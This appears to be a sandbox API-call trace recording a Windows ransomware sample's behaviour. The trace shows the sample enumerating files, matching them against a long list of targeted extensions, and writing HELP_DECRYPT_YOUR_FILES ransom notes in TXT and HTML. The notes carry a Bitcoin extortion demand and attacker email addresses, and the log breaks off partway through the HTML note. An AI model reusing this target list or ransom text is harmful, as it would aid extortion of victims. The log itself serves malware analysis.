	[0176.502] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.503] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edbtmp.log" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edbtmp.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0176.504] CloseHandle (hObject=0xffffffff) returned 1
	[0176.504] CloseHandle (hObject=0xffffffff) returned 1
	[0176.504] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcac94d4, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcac94d4, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x5001d2cc, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x30000, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmsInterceptStore.db", cAlternateFileName="SMSINT~1.DB")) returned 1
	[0176.504] lstrcmpW (lpString1="SmsInterceptStore.db", lpString2="..") returned 1
	[0176.504] lstrcmpW (lpString1="SmsInterceptStore.db", lpString2=".") returned 1
	[0176.505] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\"
	[0176.505] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\", lpString2="SmsInterceptStore.db" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\SmsInterceptStore.db") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\SmsInterceptStore.db"
	[0176.505] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\SmsInterceptStore.db") returned 72
	[0176.505] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.505] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\SmsInterceptStore.db", cchLength=0x48 | out: lpsz="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\smsinterceptstore.db") returned 0x48
	[0176.505] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.505] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\smsinterceptstore.db", lpSrch="help_decrypt_your_files") returned 0x0
	[0176.505] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\smsinterceptstore.db" | out: lpString1="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\smsinterceptstore.db") returned="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\smsinterceptstore.db"
	[0176.506] lstrlenW (lpString="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\smsinterceptstore.db") returned 72
	[0176.506] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.506] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.506] StrStrW (lpFirst=".db", lpSrch=".") returned=".db"
	[0176.506] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.506] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".db") returned=".dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0176.507] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.507] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.507] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\smsinterceptstore.db" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\smsinterceptstore.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0176.507] CloseHandle (hObject=0xffffffff) returned 1
	[0176.507] CloseHandle (hObject=0xffffffff) returned 1
	[0176.508] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcac94d4, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcac94d4, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x5001d2cc, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x30000, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmsInterceptStore.db", cAlternateFileName="SMSINT~1.DB")) returned 0
	[0176.508] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0176.556] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0176.556] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore"
	[0176.556] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\*.*") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\*.*"
	[0176.556] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.557] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.557] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\HELP_DECRYPT_YOUR_FILES.TXT") returned 79
	[0176.557] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0176.568] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0176.568] WriteFile (in: hFile=0xffffffff, lpBuffer=0x189728, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0) returned 0
	[0176.569] CloseHandle (hObject=0xffffffff) returned 1
	[0176.569] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0176.569] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0176.569] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0176.570] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0176.571] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0176.577] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff
	[0176.577] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0176.577] WriteFile (in: hFile=0xffffffff, lpBuffer=0x18a578, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0) returned 0
	[0176.577] CloseHandle (hObject=0xffffffff) returned 1
	[0176.578] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0176.578] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0176.578] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0176.578] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\HELP_DECRYPT_YOUR_FILES.HTML") returned 80
	[0176.578] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0176.589] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for 